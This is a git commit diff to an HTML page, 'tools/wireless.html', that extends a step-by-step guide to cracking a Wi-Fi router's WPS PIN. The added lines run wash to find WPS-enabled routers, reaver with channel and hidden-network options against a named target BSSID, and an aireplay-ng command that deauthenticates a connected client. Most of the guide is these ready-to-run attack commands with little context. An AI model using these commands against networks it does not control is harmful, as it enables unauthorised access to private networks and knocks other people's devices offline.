From a230f4682823c1032413cd4974f4f3a4a1d6d389 Mon Sep 17 00:00:00 2001 From: Silvino Silva Date: Sat, 9 Nov 2019 00:50:32 +0000 Subject: initial update to crux 3.5 --- tools/wireless.html | 38 +++++++++++++++++++++++++++++++------- 1 file changed, 31 insertions(+), 7 deletions(-) (limited to 'tools/wireless.html') diff --git a/tools/wireless.html b/tools/wireless.html index f4eeddb..afb12b3 100644 --- a/tools/wireless.html +++ b/tools/wireless.html @@ -13,11 +13,7 @@ # iwconfig wlp2s0 essid name_of_network -

Recover Password WPS

- -

Tested on debian system only.

- -

First get mac address of the target cell;

+

To get mac address of the target cell;

         # iwlist wlp2s0 scan
@@ -29,6 +25,11 @@
         Cell 03 - Address: A8:A6:68:98:0C:C5
+ +

Recover Password WPS

+ +

First check processes that interfere with state of the interface and kill them;

+ 
         # airmon-ng check
 
@@ -57,7 +58,7 @@
         # kill -9 1271
-

Just to be sure that everything is as it should;

+

If wireless card is intel;

         # rmmod iwlmvm
@@ -82,6 +83,18 @@
                                         (monitor mode enabled on mon0)
+

Airdump-ng don't report if a router have WPS or not, for that is used wash;

+ + 
+        # wash -i wlp2s0
+
+ +

If the program report "Found packet with bad FCS", run with -C;

+ + 
+        # wash -C -i wlp2s0
+
+

Put mon0 on same channel of target cell;

@@ -91,8 +104,19 @@
         
Start the magic;

 
         
-        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
         

 
+        
If BSSID is cloaked, not being broadcasted, provide it to reaver;

+
+        
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
+        

+
+        
-a address of access point, -c client to deauthenticate

+
+        
+        aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
+        

     
 
-- 
cgit 1.4.1-2-gfad0